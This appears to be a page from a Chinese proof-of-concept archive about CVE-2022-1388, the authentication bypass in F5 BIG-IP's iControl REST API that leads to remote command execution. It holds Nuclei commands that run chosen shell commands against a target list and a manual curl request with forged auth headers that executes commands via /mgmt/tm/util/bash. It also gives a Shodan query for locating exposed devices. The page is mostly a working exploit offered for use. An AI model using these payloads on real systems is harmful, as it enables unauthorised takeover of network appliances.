关联漏洞
标题:
F5 BIG-IP 访问控制错误漏洞
(CVE-2022-1388)
描述:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
描述
CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.
介绍
# Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter
CVE-2022-1388 is an authentication bypass vulnerability in the REST
component of BIG-IP’s iControl API that was assigned a CVSSv3
score of 9.8. The iControl REST API is used for the management and
configuration of BIG-IP devices. CVE-2022-1388 could be exploited
by an unauthenticated attacker with network access to the management
port or self IP addresses of devices that use BIG-IP. Exploitation would
allow the attacker to execute arbitrary system commands, create and
delete files and disable services.
## This template use token-spray / nuclei's CLI variable
This nuclei-template accepts shell parameter for exploitation.
We wanted to test tokens obtained from another workflow or a manual search, so we used nuclei's CLI variable feature to dynamically feed a single token value or list of tokens into these templates at run time
> `-V, -var value custom vars in var=value format`
```bash
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a
```
## POC Manual
```bash
curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'
```
### Additional Details
- https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22
### References
- https://blog.projectdiscovery.io/nuclei-v2-5-release/
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- https://github.com/alt3kx/CVE-2022-1388_PoC
- https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
- https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
- https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
- https://github.com/tenable/audit_files/tree/master/cve-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
- https://twitter.com/1ZRR4H/status/1522165718975922178
- https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml
文件快照
[4.0K] /data/pocs/f45853eddb7f0db2ec675c3914c79d17535c846e
├── [2.2K] exploit-CVE-2022-1388.yaml
└── [2.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。